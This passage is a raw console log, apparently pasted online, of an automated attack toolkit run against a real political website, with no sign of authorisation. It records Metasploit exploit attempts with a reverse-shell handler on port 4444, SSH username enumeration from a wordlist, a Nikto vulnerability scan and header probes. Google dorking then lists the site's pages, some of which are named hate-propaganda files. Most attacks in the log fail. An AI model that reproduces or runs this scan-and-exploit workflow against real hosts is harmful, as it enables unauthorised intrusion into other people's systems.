  696. | |
  697. | [ OK ] |
  698. |______________________________________________________________________________|
  699. | |
  700. | https://metasploit.com |
  701. |______________________________________________________________________________|
  702.  
  703.  
  704. =[ metasploit v4.16.8-dev ]
  705. + -- --=[ 1684 exploits - 964 auxiliary - 299 post ]
  706. + -- --=[ 498 payloads - 40 encoders - 10 nops ]
  707. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  708.  
  709. [*] Processing /root/.msf4/msfconsole.rc for ERB directives.
  710. resource (/root/.msf4/msfconsole.rc)> “spool /root/msf_console.log”
  711. [-] Unknown command: “spool.
  712. RHOST => americannaziparty.com
  713. RHOSTS => americannaziparty.com
  714. [-] americannaziparty.com:21 - Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (americannaziparty.com:21).
  715. [*] Exploit completed, but no session was created.
  716. [*] Started reverse TCP double handler on 10.13.0.22:4444
  717. [-] americannaziparty.com:21 - Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (americannaziparty.com:21).
  718. [*] Exploit completed, but no session was created.
  719. + -- --=[Port 22 opened... running tests...
  720. [exception] cannot connect to americannaziparty.com port 22: timed out
  721.  
  722. Starting Nmap 7.60 ( https://nmap.org ) at 2017-09-28 02:42 EDT
  723. Nmap scan report for americannaziparty.com (66.33.207.59)
  724. Host is up (0.069s latency).
  725. rDNS record for 66.33.207.59: ds8317.dreamservers.com
  726.  
  727. PORT STATE SERVICE VERSION
  728. 22/tcp filtered ssh
  729. Too many fingerprints match this host to give specific OS details
  730. Network Distance: 19 hops
  731.  
  732. TRACEROUTE (using proto 1/icmp)
  733. HOP RTT ADDRESS
  734. 1 111.05 ms 10.13.0.1
  735. 2 ...
  736. 3 111.33 ms po101.gra-g2-a75.fr.eu (178.33.103.231)
  737. 4 112.34 ms 10.95.33.10
  738. 5 114.39 ms be100-1111.ldn-5-a9.uk.eu (213.251.128.65)
  739. 6 114.53 ms be100-2.ldn-1-a9.uk.eu (213.251.130.121)
  740. 7 114.37 ms ge-3-3-0.mpr1.lhr3.uk.above.net (195.66.236.76)
  741. 8 114.43 ms ae6.mpr3.lhr3.uk.zip.zayo.com (64.125.21.21)
  742. 9 430.31 ms ae27.cs1.lhr15.uk.eth.zayo.com (64.125.30.234)
  743. 10 441.14 ms ae0.cs1.lhr11.uk.eth.zayo.com (64.125.29.118)
  744. 11 372.99 ms ae5.cs1.lga5.us.eth.zayo.com (64.125.29.126)
  745. 12 341.43 ms ae3.cs1.ord2.us.eth.zayo.com (64.125.29.209)
  746. 13 351.91 ms ae2.cs1.sea1.us.eth.zayo.com (64.125.29.26)
  747. 14 330.94 ms ae27.mpr1.sea1.us.zip.zayo.com (64.125.29.1)
  748. 15 362.42 ms ae8.mpr1.pdx1.us.zip.zayo.com (64.125.30.26)
  749. 16 365.91 ms 64.125.69.26.IPYX-063945-002-ZYO.zip.zayo.com (64.125.69.26)
  750. 17 369.38 ms pdx1-cr-1.sd.dreamhost.com (66.33.200.2)
  751. 18 495.60 ms pdx1-c1u56-acc.sd.dreamhost.com (66.33.200.17)
  752. 19 478.88 ms ds8317.dreamservers.com (66.33.207.59)
  753.  
  754. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  755. Nmap done: 1 IP address (1 host up) scanned in 12.46 seconds
  756.  
  757. , ,
  758. / \
  759. ((__---,,,---__))
  760. (_) O O (_)_________
  761. \ _ / |\
  762. o_o \ M S F | \
  763. \ _____ | *
  764. ||| WW|||
  765. ||| |||
  766.  
  767.  
  768. =[ metasploit v4.16.8-dev ]
  769. + -- --=[ 1684 exploits - 964 auxiliary - 299 post ]
  770. + -- --=[ 498 payloads - 40 encoders - 10 nops ]
  771. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  772.  
  773. [*] Processing /root/.msf4/msfconsole.rc for ERB directives.
  774. resource (/root/.msf4/msfconsole.rc)> “spool /root/msf_console.log”
  775. [-] Unknown command: “spool.
  776. USER_FILE => /usr/share/brutex/wordlists/simple-users.txt
  777. RHOSTS => americannaziparty.com
  778. [!] RHOST is not a valid option for this module. Did you mean RHOSTS?
  779. RHOST => americannaziparty.com
  780. [*] 66.33.207.59:22 - SSH - Checking for false positives
  781. [*] 66.33.207.59:22 - SSH - Starting scan
  782. [-] 66.33.207.59:22 - SSH - User 'admin' on could not connect
  783. [-] 66.33.207.59:22 - SSH - User 'administrator' on could not connect
  784. [-] 66.33.207.59:22 - SSH - User 'anonymous' on could not connect
  785. [-] 66.33.207.59:22 - SSH - User 'backup' on could not connect
  786. [-] 66.33.207.59:22 - SSH - User 'bee' on could not connect
  787. [-] 66.33.207.59:22 - SSH - User 'ftp' on could not connect
  788. [-] 66.33.207.59:22 - SSH - User 'guest' on could not connect
  789. [-] 66.33.207.59:22 - SSH - User 'GUEST' on could not connect
  790. [-] 66.33.207.59:22 - SSH - User 'info' on could not connect
  791. [-] 66.33.207.59:22 - SSH - User 'mail' on could not connect
  792. [-] 66.33.207.59:22 - SSH - User 'mailadmin' on could not connect
  793. [-] 66.33.207.59:22 - SSH - User 'msfadmin' on could not connect
  794. [-] 66.33.207.59:22 - SSH - User 'mysql' on could not connect
  795. [-] 66.33.207.59:22 - SSH - User 'nobody' on could not connect
  796. [-] 66.33.207.59:22 - SSH - User 'oracle' on could not connect
  797. [-] 66.33.207.59:22 - SSH - User 'owaspbwa' on could not connect
  798. [-] 66.33.207.59:22 - SSH - User 'postfix' on could not connect
  799. [-] 66.33.207.59:22 - SSH - User 'postgres' on could not connect
  800. [-] 66.33.207.59:22 - SSH - User 'private' on could not connect
  801. [-] 66.33.207.59:22 - SSH - User 'proftpd' on could not connect
  802. [-] 66.33.207.59:22 - SSH - User 'public' on could not connect
  803. [-] 66.33.207.59:22 - SSH - User 'root' on could not connect
  804. [-] 66.33.207.59:22 - SSH - User 'superadmin' on could not connect
  805. [-] 66.33.207.59:22 - SSH - User 'support' on could not connect
  806. [-] 66.33.207.59:22 - SSH - User 'sys' on could not connect
  807. [-] 66.33.207.59:22 - SSH - User 'system' on could not connect
  808. [-] 66.33.207.59:22 - SSH - User 'systemadmin' on could not connect
  809. [-] 66.33.207.59:22 - SSH - User 'systemadministrator' on could not connect
  810. [-] 66.33.207.59:22 - SSH - User 'test' on could not connect
  811. [-] 66.33.207.59:22 - SSH - User 'tomcat' on could not connect
  812. [-] 66.33.207.59:22 - SSH - User 'user' on could not connect
  813. [-] 66.33.207.59:22 - SSH - User 'webmaster' on could not connect
  814. [-] 66.33.207.59:22 - SSH - User 'www-data' on could not connect
  815. [-] 66.33.207.59:22 - SSH - User 'Fortimanager_Access' on could not connect
  816. [*] Scanned 1 of 1 hosts (100% complete)
  817. [*] Auxiliary module execution completed
  818. [-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: KEY_FILE.
  819. [*] americannaziparty.com:22 - Scanned 1 of 1 hosts (100% complete)
  820. [*] Auxiliary module execution completed
  821. + -- --=[Port 23 closed... skipping.
  822. + -- --=[Port 25 closed... skipping.
  823. + -- --=[Port 53 closed... skipping.
  824. + -- --=[Port 79 closed... skipping.
  825. + -- --=[Port 80 opened... running tests...
  826. + -- ----------------------------=[Checking for WAF]=------------------------ -- +
  827. ERROR:root:Site http://americannaziparty.com appears to be down
  828.  
  829. ^ ^
  830. _ __ _ ____ _ __ _ _ ____
  831. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  832. | V V // o // _/ | V V // 0 // 0 // _/
  833. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
  834. <
  835. ...'
  836.  
  837. WAFW00F - Web Application Firewall Detection Tool
  838.  
  839. By Sandro Gauci && Wendel G. Henrique
  840.  
  841. Checking http://americannaziparty.com
  842.  
  843. + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +
  844. /usr/share/whatweb/lib/target.rb:189: warning: constant ::TimeoutError is deprecated
  845. http://americannaziparty.com ERROR: Timed out execution expired
  846.  
  847. __ ______ _____
  848. \ \/ / ___|_ _|
  849. \ /\___ \ | |
  850. / \ ___) || |
  851. /_/\_|____/ |_|
  852.  
  853. + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
  854. + -- --=[Target: americannaziparty.com:80
  855. + -- --=[Port is closed!
  856.  
  857. + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +
  858. + -- --=[Checking if X-Content options are enabled on americannaziparty.com...
  859.  
  860. + -- --=[Checking if X-Frame options are enabled on americannaziparty.com...
  861.  
  862. + -- --=[Checking if X-XSS-Protection header is enabled on americannaziparty.com...
  863.  
  864. + -- --=[Checking HTTP methods on americannaziparty.com...
  865.  
  866. + -- --=[Checking if TRACE method is enabled on americannaziparty.com...
  867.  
  868. + -- --=[Checking for META tags on americannaziparty.com...
  869.  
  870. + -- --=[Checking for open proxy on americannaziparty.com...
  871.  
  872. + -- --=[Enumerating software on americannaziparty.com...
  873.  
  874. + -- --=[Checking if Strict-Transport-Security is enabled on americannaziparty.com...
  875.  
  876. + -- --=[Checking for Flash cross-domain policy on americannaziparty.com...
  877.  
  878. + -- --=[Checking for Silverlight cross-domain policy on americannaziparty.com...
  879. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  880. <html><head>
  881. <title>301 Moved Permanently</title>
  882. </head><body>
  883. <h1>Moved Permanently</h1>
  884. <p>The document has moved <a href="http://www.americannaziparty.com/clientaccesspolicy.xml">here</a>.</p>
  885. </body></html>
  886.  
  887. + -- --=[Checking for HTML5 cross-origin resource sharing on americannaziparty.com...
  888.  
  889. + -- --=[Retrieving robots.txt on americannaziparty.com...
  890. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  891. <html><head>
  892. <title>301 Moved Permanently</title>
  893. </head><body>
  894. <h1>Moved Permanently</h1>
  895. <p>The document has moved <a href="http://www.americannaziparty.com/robots.txt">here</a>.</p>
  896. </body></html>
  897.  
  898. + -- --=[Retrieving sitemap.xml on americannaziparty.com...
  899. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  900. <html><head>
  901. <title>301 Moved Permanently</title>
  902. </head><body>
  903. <h1>Moved Permanently</h1>
  904. <p>The document has moved <a href="http://www.americannaziparty.com/sitemap.xml">here</a>.</p>
  905. </body></html>
  906.  
  907. + -- --=[Checking cookie attributes on americannaziparty.com...
  908.  
  909. + -- --=[Checking for ASP.NET Detailed Errors on americannaziparty.com...
  910. error was encountered while trying to use an ErrorDocument to handle the request.</p>
  911.  
  912.  
  913. + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +
  914. - Nikto v2.1.6
  915. ---------------------------------------------------------------------------
  916. + Target IP: 66.33.207.59
  917. + Target Hostname: americannaziparty.com
  918. + Target Port: 80
  919. + Start Time: 2017-09-28 03:27:49 (GMT-4)
  920. ---------------------------------------------------------------------------
  921. + Server: Apache
  922. + The anti-clickjacking X-Frame-Options header is not present.
  923. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  924. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  925. + Root page / redirects to: http://www.americannaziparty.com/
  926. + No CGI Directories found (use '-C all' to force check all possible dirs)
  927. + Server leaks inodes via ETags, header found with file /americannazipartycom.zip, fields: 0x304 0x506c4687e0800
  928. + ERROR: Error limit (20) reached for host, giving up. Last error:
  929. + Scan terminated: 0 error(s) and 4 item(s) reported on remote host
  930. + End Time: 2017-09-28 03:31:42 (GMT-4) (233 seconds)
  931. ---------------------------------------------------------------------------
  932. + 1 host(s) tested
  933. + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +
  934. [+] Screenshot saved to /usr/share/sniper/loot/screenshots/americannaziparty.com-port80.jpg
  935. + -- ----------------------------=[Running Google Hacking Queries]=--------------------- -- +
  936. + -- ----------------------------=[Running InUrlBR OSINT Queries]=---------- -- +
  937.  
  938. _____ .701F. .iBR. .7CL. .70BR. .7BR. .7BR'''Cq. .70BR. .1BR'''Yp, .8BR'''Cq.
  939. (_____) 01 01N. C 01 C 01 .01. 01 01 Yb 01 .01.
  940. (() ()) 01 C YCb C 01 C 01 ,C9 01 01 dP 01 ,C9
  941. \ / 01 C .CN. C 01 C 0101dC9 01 01'''bg. 0101dC9
  942. \ / 01 C .01.C 01 C 01 YC. 01 , 01 .Y 01 YC.
  943. /=\ 01 C Y01 YC. ,C 01 .Cb. 01 ,C 01 ,9 01 .Cb.
  944. [___] .J01L. .JCL. YC .b0101d'. .J01L. .J01. .J01010101C .J0101Cd9 .J01L. .J01./ 2.1
  945.  
  946. __[ ! ] Neither war between hackers, nor peace for the system.
  947. __[ ! ] http://blog.inurl.com.br
  948. __[ ! ] http://fb.com/InurlBrasil
  949. __[ ! ] http://twitter.com/@googleinurl
  950. __[ ! ] http://github.com/googleinurl
  951. __[ ! ] Current PHP version::[ 7.0.22-3 ]
  952. __[ ! ] Current script owner::[ root ]
  953. __[ ! ] Current uname::[ Linux Kali 4.12.0-kali2-amd64 #1 SMP Debian 4.12.12-2kali1 (2017-09-13) x86_64 ]
  954. __[ ! ] Current pwd::[ /usr/share/sniper ]
  955. __[ ! ] Help: php inurlbr.php --help
  956. ------------------------------------------------------------------------------------------------------------------------
  957.  
  958. [ ! ] Starting SCANNER INURLBR 2.1 at [28-09-2017 03:32:26]
  959. [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
  960. It is the end user's responsibility to obey all applicable local, state and federal laws.
  961. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  962.  
  963. [ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-americannaziparty.com.txt ]
  964. [ INFO ][ DORK ]::[ site:americannaziparty.com ]
  965. [ INFO ][ SEARCHING ]:: {
  966. [ INFO ][ ENGINE ]::[ GOOGLE - www.google.lu ]
  967.  
  968. [ INFO ][ SEARCHING ]::
  969. -[:::]
  970. [ INFO ][ ENGINE ]::[ GOOGLE API ]
  971.  
  972. [ INFO ][ SEARCHING ]::
  973. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  974. [ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.com.om ID: 003917828085772992913:gmoeray5sa8 ]
  975.  
  976. [ INFO ][ SEARCHING ]::
  977. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  978.  
  979. [ INFO ][ TOTAL FOUND VALUES ]:: [ 100 ]
  980.  
  981.  
  982. _[ - ]::--------------------------------------------------------------------------------------------------------------
  983. |_[ + ] [ 0 / 100 ]-[03:32:36] [ - ]
  984. |_[ + ] Target:: [ http://www.americannaziparty.com/ ]
  985. |_[ + ] Exploit::
  986. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  987. |_[ + ] More details::
  988. |_[ + ] Found:: UNIDENTIFIED
  989.  
  990. _[ - ]::--------------------------------------------------------------------------------------------------------------
  991. |_[ + ] [ 1 / 100 ]-[03:32:37] [ - ]
  992. |_[ + ] Target:: [ http://www.americannaziparty.com/support/ ]
  993. |_[ + ] Exploit::
  994. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  995. |_[ + ] More details::
  996. |_[ + ] Found:: UNIDENTIFIED
  997.  
  998. _[ - ]::--------------------------------------------------------------------------------------------------------------
  999. |_[ + ] [ 2 / 100 ]-[03:32:37] [ - ]
  1000. |_[ + ] Target:: [ http://www.americannaziparty.com/about/ ]
  1001. |_[ + ] Exploit::
  1002. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1003. |_[ + ] More details::
  1004. |_[ + ] Found:: UNIDENTIFIED
  1005.  
  1006. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1007. |_[ + ] [ 3 / 100 ]-[03:32:38] [ - ]
  1008. |_[ + ] Target:: [ http://www.americannaziparty.com/NEW_NS_BULLETIN.pdf ]
  1009. |_[ + ] Exploit::
  1010. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1011. |_[ + ] More details::
  1012. |_[ + ] Found:: UNIDENTIFIED
  1013.  
  1014. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1015. |_[ + ] [ 4 / 100 ]-[03:32:40] [ - ]
  1016. |_[ + ] Target:: [ https://www.americannaziparty.com/januaryforwebsite.pdf ]
  1017. |_[ + ] Exploit::
  1018. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:88f4:443
  1019. |_[ + ] More details::
  1020. |_[ + ] Found:: UNIDENTIFIED
  1021.  
  1022. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1023. |_[ + ] [ 5 / 100 ]-[03:32:40] [ - ]
  1024. |_[ + ] Target:: [ http://www.americannaziparty.com/audiolinks.php ]
  1025. |_[ + ] Exploit::
  1026. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1027. |_[ + ] More details::
  1028. |_[ + ] Found:: UNIDENTIFIED
  1029.  
  1030. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1031. |_[ + ] [ 6 / 100 ]-[03:32:40] [ - ]
  1032. |_[ + ] Target:: [ http://www.americannaziparty.com/faq.php ]
  1033. |_[ + ] Exploit::
  1034. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1035. |_[ + ] More details::
  1036. |_[ + ] Found:: UNIDENTIFIED
  1037.  
  1038. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1039. |_[ + ] [ 7 / 100 ]-[03:32:41] [ - ]
  1040. |_[ + ] Target:: [ http://www.americannaziparty.com/education.pdf ]
  1041. |_[ + ] Exploit::
  1042. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1043. |_[ + ] More details::
  1044. |_[ + ] Found:: UNIDENTIFIED
  1045.  
  1046. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1047. |_[ + ] [ 8 / 100 ]-[03:32:41] [ - ]
  1048. |_[ + ] Target:: [ http://www.americannaziparty.com/14wordscards.pdf ]
  1049. |_[ + ] Exploit::
  1050. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1051. |_[ + ] More details::
  1052. |_[ + ] Found:: UNIDENTIFIED
  1053.  
  1054. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1055. |_[ + ] [ 9 / 100 ]-[03:32:41] [ - ]
  1056. |_[ + ] Target:: [ http://www.americannaziparty.com/contact.php ]
  1057. |_[ + ] Exploit::
  1058. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1059. |_[ + ] More details::
  1060. |_[ + ] Found:: UNIDENTIFIED
  1061.  
  1062. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1063. |_[ + ] [ 10 / 100 ]-[03:32:42] [ - ]
  1064. |_[ + ] Target:: [ http://www.americannaziparty.com/trifold.pdf ]
  1065. |_[ + ] Exploit::
  1066. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1067. |_[ + ] More details::
  1068. |_[ + ] Found:: UNIDENTIFIED
  1069.  
  1070. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1071. |_[ + ] [ 11 / 100 ]-[03:32:42] [ - ]
  1072. |_[ + ] Target:: [ http://www.americannaziparty.com/support/gifs/ ]
  1073. |_[ + ] Exploit::
  1074. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1075. |_[ + ] More details::
  1076. |_[ + ] Found:: UNIDENTIFIED
  1077.  
  1078. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1079. |_[ + ] [ 12 / 100 ]-[03:32:42] [ - ]
  1080. |_[ + ] Target:: [ http://www.americannaziparty.com/SApage.htm ]
  1081. |_[ + ] Exploit::
  1082. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1083. |_[ + ] More details::
  1084. |_[ + ] Found:: UNIDENTIFIED
  1085.  
  1086. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1087. |_[ + ] [ 13 / 100 ]-[03:32:42] [ - ]
  1088. |_[ + ] Target:: [ https://www.americannaziparty.com/rally.htm ]
  1089. |_[ + ] Exploit::
  1090. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:88f4:443
  1091. |_[ + ] More details::
  1092. |_[ + ] Found:: UNIDENTIFIED
  1093.  
  1094. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1095. |_[ + ] [ 14 / 100 ]-[03:32:43] [ - ]
  1096. |_[ + ] Target:: [ http://www.americannaziparty.com/expensivewars.pdf ]
  1097. |_[ + ] Exploit::
  1098. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1099. |_[ + ] More details::
  1100. |_[ + ] Found:: UNIDENTIFIED
  1101.  
  1102. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1103. |_[ + ] [ 15 / 100 ]-[03:32:43] [ - ]
  1104. |_[ + ] Target:: [ http://www.americannaziparty.com/wpww.pdf ]
  1105. |_[ + ] Exploit::
  1106. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1107. |_[ + ] More details::
  1108. |_[ + ] Found:: UNIDENTIFIED
  1109.  
  1110. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1111. |_[ + ] [ 16 / 100 ]-[03:32:43] [ - ]
  1112. |_[ + ] Target:: [ http://www.americannaziparty.com/solution.pdf ]
  1113. |_[ + ] Exploit::
  1114. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1115. |_[ + ] More details::
  1116. |_[ + ] Found:: UNIDENTIFIED
  1117.  
  1118. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1119. |_[ + ] [ 17 / 100 ]-[03:32:44] [ - ]
  1120. |_[ + ] Target:: [ http://www.americannaziparty.com/obama.pdf ]
  1121. |_[ + ] Exploit::
  1122. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1123. |_[ + ] More details::
  1124. |_[ + ] Found:: UNIDENTIFIED
  1125.  
  1126. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1127. |_[ + ] [ 18 / 100 ]-[03:32:44] [ - ]
  1128. |_[ + ] Target:: [ http://www.americannaziparty.com/platform/index.php ]
  1129. |_[ + ] Exploit::
  1130. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1131. |_[ + ] More details::
  1132. |_[ + ] Found:: UNIDENTIFIED
  1133.  
  1134. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1135. |_[ + ] [ 19 / 100 ]-[03:32:44] [ - ]
  1136. |_[ + ] Target:: [ http://www.americannaziparty.com/merchandise/index.php ]
  1137. |_[ + ] Exploit::
  1138. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1139. |_[ + ] More details::
  1140. |_[ + ] Found:: UNIDENTIFIED
  1141.  
  1142. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1143. |_[ + ] [ 20 / 100 ]-[03:32:44] [ - ]
  1144. |_[ + ] Target:: [ http://www.americannaziparty.com/sympathizer/sympathizer.php ]
  1145. |_[ + ] Exploit::
  1146. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1147. |_[ + ] More details::
  1148. |_[ + ] Found:: UNIDENTIFIED
  1149.  
  1150. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1151. |_[ + ] [ 21 / 100 ]-[03:32:46] [ - ]
  1152. |_[ + ] Target:: [ http://www.americannaziparty.com/about/InternationalJew.pdf ]
  1153. |_[ + ] Exploit::
  1154. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1155. |_[ + ] More details::
  1156. |_[ + ] Found:: UNIDENTIFIED
  1157.  
  1158. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1159. |_[ + ] [ 22 / 100 ]-[03:32:47] [ - ]
  1160. |_[ + ] Target:: [ https://www.americannaziparty.com/This_Time_the_World/Chapter_13.html ]
  1161. |_[ + ] Exploit::
  1162. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:88f4:443
  1163. |_[ + ] More details::
  1164. |_[ + ] Found:: UNIDENTIFIED
  1165.  
  1166. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1167. |_[ + ] [ 23 / 100 ]-[03:32:47] [ - ]
  1168. |_[ + ] Target:: [ http://www.americannaziparty.com/rockwell/index.php ]
  1169. |_[ + ] Exploit::
  1170. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1171. |_[ + ] More details::
  1172. |_[ + ] Found:: UNIDENTIFIED
  1173.  
  1174. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1175. |_[ + ] [ 24 / 100 ]-[03:32:47] [ - ]
  1176. |_[ + ] Target:: [ http://www.americannaziparty.com/news/index.php ]
  1177. |_[ + ] Exploit::
  1178. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1179. |_[ + ] More details::
  1180. |_[ + ] Found:: UNIDENTIFIED
  1181.  
  1182. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1183. |_[ + ] [ 25 / 100 ]-[03:32:47] [ - ]
  1184. |_[ + ] Target:: [ https://www.americannaziparty.com/This_Time_the_World/index.html ]
  1185. |_[ + ] Exploit::
  1186. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:88f4:443
  1187. |_[ + ] More details::
  1188. |_[ + ] Found:: UNIDENTIFIED
  1189.  
  1190. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1191. |_[ + ] [ 26 / 100 ]-[03:32:48] [ - ]
  1192. |_[ + ] Target:: [ http://www.americannaziparty.com/support/OfficialApp.pdf ]
  1193. |_[ + ] Exploit::
  1194. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1195. |_[ + ] More details::
  1196. |_[ + ] Found:: UNIDENTIFIED
  1197.  
  1198. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1199. |_[ + ] [ 27 / 100 ]-[03:32:48] [ - ]
  1200. |_[ + ] Target:: [ http://www.americannaziparty.com/sympathizer/nonwhite1.pdf ]
  1201. |_[ + ] Exploit::
  1202. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1203. |_[ + ] More details::
  1204. |_[ + ] Found:: UNIDENTIFIED
  1205.  
  1206. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1207. |_[ + ] [ 28 / 100 ]-[03:32:48] [ - ]
  1208. |_[ + ] Target:: [ http://www.americannaziparty.com/rockwell/materials/av ]
  1209. |_[ + ] Exploit::
  1210. |_[ + ] Information Server:: HTTP/1.1 301 Moved Permanently, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1211. |_[ + ] More details::
  1212. |_[ + ] Found:: UNIDENTIFIED
  1213.  
  1214. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1215. |_[ + ] [ 29 / 100 ]-[03:32:48] [ - ]
  1216. |_[ + ] Target:: [ http://www.americannaziparty.com/news/archives.php?report_date=2011-06-24 ]
  1217. |_[ + ] Exploit::
  1218. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:89f4:80
  1219. |_[ + ] More details::
  1220. |_[ + ] Found:: UNIDENTIFIED
  1221.  
  1222. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1223. |_[ + ] [ 30 / 100 ]-[03:32:49] [ - ]
  1224. |_[ + ] Target:: [ https://www.americannaziparty.com/White_Power_html/White_Power/Chapter_16.html ]
  1225. |_[ + ] Exploit::
  1226. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:88f4:443
  1227. |_[ + ] More details::
  1228. |_[ + ] Found:: UNIDENTIFIED
  1229.  
  1230. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1231. |_[ + ] [ 31 / 100 ]-[03:32:49] [ - ]
  1232. |_[ + ] Target:: [ https://www.americannaziparty.com/White_Power_html/White_Power/Chapter_15.html ]
  1233. |_[ + ] Exploit::
  1234. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:88f4:443
